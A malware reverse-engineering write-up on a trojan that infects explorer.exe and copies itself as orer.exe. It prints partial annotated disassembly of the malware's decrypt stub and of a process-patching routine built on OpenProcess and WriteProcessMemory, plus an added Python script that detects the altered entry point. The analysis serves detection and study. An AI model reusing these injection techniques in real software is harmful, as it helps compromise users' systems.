.:: Orer.exe Reverse Code Engineering #1 ::.

Orer.exe is the post-infection result of Trojan-xxx. Its name derives from explORER.exe; in other words, the Trojan cuts the beginning off explorer's name. The Trojan attacks the explorer executable by appending the malicious code to it, and finally duplicates itself under the name orer.exe into the Temp directory. As you can understand, it is relatively easy to detect; please note that the executable's date/time will correspond to that of the original explorer.exe.

Usual signs of infection:

- Desktop icons disappear for instants
- RAdmin and other net-monitoring tools are unable to establish connections
- Windows frequently reports memory access violations
- MS Word is killed a few seconds after it is opened
- Particular programs, such as FileMaker, are destroyed

.:: First Look Analysis ::.

The executable is neither packed nor encrypted (important in order to maintain the same size as explorer), except for some small and simple portions of self-modifying code; debug information is not stripped (remember that orer.exe derives from explorer.exe), so RCE is truly easy. At a first look at the disassembly, the executable sets many timers upon certain processes, and:

01019634 call loc_10460D0 ; Entry Point lands here
01019639 sub esp, 44h
0101963C push esi
0101963D push edi
0101963E push 10h ; nInBufferSize
01019640 push offset aExplorerstartu ; "ExplorerStartup"
01019645 call sub_10146D4
0101964A call sub_1019708
0101964F push 1 ; uMode
01019651 call ds:SetErrorMode

The code listed above corresponds to the entry point of orer, and immediately we can see a fundamental difference from explorer's code: the call to 010460D0, which contains a runtime decrypt routine.
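The write-up's first-look observation (orer keeps explorer's entry point at 01019634 but the first instruction there is a CALL into 010460D0) suggests a quick triage check: walk the PE headers of a trusted explorer.exe and of the suspect orer.exe, map each entry point to its file offset, and compare the first bytes. The following is an added example written for this page, not code from the original analysis. It assumes an image base of 0x01000000 (consistent with the listing's addresses), builds two constructed in-memory PE32 stand-ins with an assumed two-section layout (.text at RVA 0x1000, .data at RVA 0x40000), and uses a placeholder prologue for the trusted copy; only the suspect's leading CALL 010460D0 is taken from the listing. Which section holds 010460D0 in the real binary is whatever its section table says, not what this sample assumes.

```python
"""Added example, not from the original write-up: a minimal PE32 header walker
that compares the entry point of a suspect orer.exe against a trusted
explorer.exe. Orer keeps explorer's entry-point address (01019634) but starts
with a CALL into a runtime decrypt routine (010460D0), so the bytes at the
entry point are the quick triage check. Every binary here is constructed in
memory; the section layout and the trusted prologue are assumptions."""
import struct

IMAGE_BASE = 0x01000000  # assumed base, consistent with the write-up's listing


def parse_pe32(data: bytes) -> dict:
    """Return entry RVA, image base and section table of a PE32 file image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (not PE32+) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]     # ImageBase
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def section_of(pe: dict, rva: int):
    """Section header containing rva, or None if it maps to no section."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s
    return None


def entry_report(data: bytes, nbytes: int = 5) -> dict:
    """First bytes at the entry point and, if they are a CALL rel32, its target."""
    pe = parse_pe32(data)
    sec = section_of(pe, pe["entry_rva"])
    if sec is None:
        raise ValueError("entry point outside every section")
    off = pe["entry_rva"] - sec["va"] + sec["raw_ptr"]           # RVA -> file offset
    first = data[off:off + nbytes]
    report = {"entry_va": pe["image_base"] + pe["entry_rva"], "entry_bytes": first,
              "call_target": None, "call_section": None}
    if len(first) >= 5 and first[0] == 0xE8:                     # E8 rel32 = CALL
        target_rva = pe["entry_rva"] + 5 + struct.unpack("<i", first[1:5])[0]
        report["call_target"] = pe["image_base"] + target_rva
        tsec = section_of(pe, target_rva)
        report["call_section"] = tsec["name"] if tsec else None
    return report


def compare_entry(trusted: bytes, suspect: bytes) -> list:
    """Findings a triage script would print for explorer.exe vs orer.exe."""
    a, b = entry_report(trusted), entry_report(suspect)
    findings = []
    if a["entry_va"] != b["entry_va"]:
        findings.append(f"entry point moved: {a['entry_va']:#x} -> {b['entry_va']:#x}")
    if a["entry_bytes"] != b["entry_bytes"]:
        findings.append(f"entry bytes differ: {a['entry_bytes'].hex()} -> "
                        f"{b['entry_bytes'].hex()}")
    if b["call_target"] is not None and a["call_target"] != b["call_target"]:
        findings.append(f"entry CALL redirected to {b['call_target']:#x} "
                        f"(section {b['call_section']})")
    return findings


def build_sample(entry_code: bytes, entry_rva: int = 0x19634) -> bytes:
    """Constructed PE32 stand-in: .text at RVA 0x1000, .data at RVA 0x40000."""
    secs = [(b".text", 0x1000, 0x3F000, 0x400), (b".data", 0x40000, 0x10000, 0x3F400)]
    img = bytearray(0x4F400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 60, 0x80)                         # e_lfanew
    struct.pack_into("<IHHIIIHH", img, 0x80, 0x4550, 0x14C, len(secs), 0, 0, 0, 224, 0x102)
    opt = 0x80 + 24
    struct.pack_into("<H", img, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", img, opt + 16, entry_rva)
    struct.pack_into("<I", img, opt + 28, IMAGE_BASE)
    for i, (name, va, size, raw) in enumerate(secs):
        struct.pack_into("<8sIIIIIIHHI", img, opt + 224 + 40 * i,
                         name, size, va, size, raw, 0, 0, 0, 0, 0x60000020)
    off = entry_rva - secs[0][1] + secs[0][3]
    img[off:off + len(entry_code)] = entry_code
    return bytes(img)


# Constructed samples: a placeholder prologue for the trusted copy, and for the
# suspect the CALL 010460D0 that the write-up shows at orer's entry point.
TRUSTED = build_sample(b"\x83\xEC\x44\x56\x57")       # sub esp,44h; push esi; push edi
SUSPECT = build_sample(b"\xE8" + struct.pack("<i", 0x460D0 - (0x19634 + 5)))

if __name__ == "__main__":
    for line in compare_entry(TRUSTED, SUSPECT):
        print(line)
```

On a real pair of files the same functions run on the bytes read from the trusted explorer.exe and from the copy found in the Temp directory; the point of resolving the CALL target is that an entry instruction jumping into a region the section table does not describe as code is exactly the anomaly this write-up's first look turned up.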
+++++++++++++++++++

APIs referenced by Orer2a: CreateRemoteThread, GetCurrentProcessId, ReadProcessMemory, WriteProcessMemory, CreateThread, CreateEventA, WaitForSingleObject, FindFirstFileW, FindNextFileW, GetCurrentDirectoryW, SetCurrentDirectory, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ws2_32.connect, WSAStartup, socket, gethostbyname, send, recv, WININET.InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle.

Into the Main Thread:

00840277 ^E0 D6 LOOPDNE SHORT 0084024F
00840279 61 POPAD
0084027A 0BD2 OR EDX,EDX ;Orer's EntryPoint Address
0084027C 74 1C JE SHORT 0084029A
0084027E 832C24 05 SUB DWORD PTR SS:[ESP],5
00840282 8B1424 MOV EDX,DWORD PTR SS:[ESP]
00840285 6A 00 PUSH 0
00840287 6A 05 PUSH 5
00840289 6A 00 PUSH 0
0084028B 52 PUSH EDX ;Orer's EP
0084028C 8D83 47114000 LEA EAX,DWORD PTR DS:[EBX+401147]
00840292 50 PUSH EAX ;00840147
00840293 6A 00 PUSH 0
00840295 E8 340E0000 CALL 008410CE
0084029A 6A 40 PUSH 40
0084029C 68 00100000 PUSH 1000
008402A1 68 951D0000 PUSH 1D95
008402A6 6A 00 PUSH 0
008402A8 FF93 D9284000 CALL DWORD PTR DS:[EBX+4028D9] ;VirtualAlloc
008402AE 8983 CA144000 MOV DWORD PTR DS:[EBX+4014CA],EAX
008402B4 8D93 4C114000 LEA EDX,DWORD PTR DS:[EBX+40114C] ;0084014c
008402BA EB 16 JMP SHORT 008402D2
008402BC 8B32 MOV ESI,DWORD PTR DS:[EDX]
008402BE 8B4A 04 MOV ECX,DWORD PTR DS:[EDX+4]
008402C1 6A 01 PUSH 1
008402C3 51 PUSH ECX
008402C4 6A 00 PUSH 0
008402C6 56 PUSH ESI ;orer.010460d0
008402C7 50 PUSH EAX ;BaseAddress of the allocated region
008402C8 6A 00 PUSH 0
008402CA E8 FF0D0000 CALL 008410CE ;This time the pushed bytes are taken from 010460d0
008402D2 833A 00 CMP DWORD PTR DS:[EDX],0 ;010460d0
008402D5 ^75 E5 JNZ SHORT 008402BC ;Procedure is repeated for 010458e0, Reverse(84 5C 00 01 EC 01 || 00 00 10 6D 04 01), and orer's EP
008402D7 FFB3 CA144000 PUSH DWORD PTR DS:[EBX+4014CA]
008402DD 68 04010000 PUSH 104
008402E2 FFB3 CA144000 PUSH DWORD PTR DS:[EBX+4014CA]
008402E8 6A 00 PUSH 0
008402EA FF93 B9284000 CALL DWORD PTR DS:[EBX+4028B9] ;GetModuleFileName

GetModuleFileName obtains the full path and filename of the executable file containing the current module.

00810306 8039 45 CMP BYTE PTR DS:[ECX],45 ;'E'
00810309 0F85 B9000000 JNZ 008103C8 ;Jump to GetWindowsDirectory
0081030F 8079 02 78 CMP BYTE PTR DS:[ECX+2],78 ;'x'
...
008103C8 FFB3 CA144000 PUSH DWORD PTR DS:[EBX+4014CA]
008103CE 68 04010000 PUSH 104
008103D3 FFB3 CA144000 PUSH DWORD PTR DS:[EBX+4014CA]
008103D9 FF93 B5284000 CALL DWORD PTR DS:[EBX+4028B5] ;kernel32.GetWindowsDirectoryW
...
008103F4 6A 00 PUSH 0
008103F6 50 PUSH EAX
008103F7 57 PUSH EDI
008103F8 57 PUSH EDI
008103F9 50 PUSH EAX
008103FA 57 PUSH EDI
008103FB 57 PUSH EDI
008103FC 68 04010000 PUSH 104
00810401 FF93 BD284000 CALL DWORD PTR DS:[EBX+4028BD] ;kernel32.GetTempPathW
0081040D 03F8 ADD EDI,EAX
0081040F 03F8 ADD EDI,EAX
...
00810418 FF93 7D284000 CALL DWORD PTR DS:[EBX+40287D] ;kernel32.GetFileAttributesW

Gets the file attributes of orer.exe; if orer already exists, control goes back to the original explorer.

-----------------------------------------------------

Into call 008410CE:

008410CE 55 PUSH EBP ;kernel32.7C800000
008410CF 8BEC MOV EBP,ESP
...
008410E3 FF75 18 PUSH DWORD PTR SS:[EBP+18] ;00000005
008410E6 FF75 10 PUSH DWORD PTR SS:[EBP+10] ;Orer's EP
008410E9 FF93 DD284000 CALL DWORD PTR DS:[EBX+4028DD] ;VirtualProtect
008110EF 837D 08 00 CMP DWORD PTR SS:[EBP+8],0
008110F3 75 09 JNZ SHORT 008110FE
008110F5 FF93 09294000 CALL DWORD PTR DS:[EBX+402909] ;kernel32.GetCurrentProcessId
008110FB 8945 08 MOV DWORD PTR SS:[EBP+8],EAX
008110FE FF75 08 PUSH DWORD PTR SS:[EBP+8]
00811101 6A 00 PUSH 0
00811103 68 FF0F1F00 PUSH 1F0FFF ;PROCESS_ALL_ACCESS
00811108 FF93 01294000 CALL DWORD PTR DS:[EBX+402901] ;OpenProcess
0081110E 0BC0 OR EAX,EAX
00811110 74 49 JE SHORT 0081115B
00811112 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
00811115 837D 14 00 CMP DWORD PTR SS:[EBP+14],0
00811119 74 14 JE SHORT 0081112F
0081111B 6A 00 PUSH 0
0081111D FF75 18 PUSH DWORD PTR SS:[EBP+18]
00811120 FF75 14 PUSH DWORD PTR SS:[EBP+14]
00811123 FF75 10 PUSH DWORD PTR SS:[EBP+10]
00811126 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
00811129 FF93 0D294000 CALL DWORD PTR DS:[EBX+40290D]
0081112F 6A 00 PUSH 0
00811131 FF75 18 PUSH DWORD PTR SS:[EBP+18] ;00000005
00811134 FF75 0C PUSH DWORD PTR SS:[EBP+C] ;00840147
00811137 FF75 10 PUSH DWORD PTR SS:[EBP+10] ;Orer's EP
0081113A FF75 F8 PUSH DWORD PTR SS:[EBP-8] ;Handle of the process object
0081113D FF93 11294000 CALL DWORD PTR DS:[EBX+402911] ;WriteProcessMemory
00811143 0BC0 OR EAX,EAX
00811145 75 09 JNZ SHORT 00811150
00811147 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
0081114A C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
00811150 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
00811153 FF93 A5284000 CALL DWORD PTR DS:[EBX+4028A5] ;CloseHandleA
00811159 EB 09 JMP SHORT 00811164
0081115B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
0081115E C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
00811164 61 POPAD
00811165 C9 LEAVE
00811166 C2 1800 RETN 18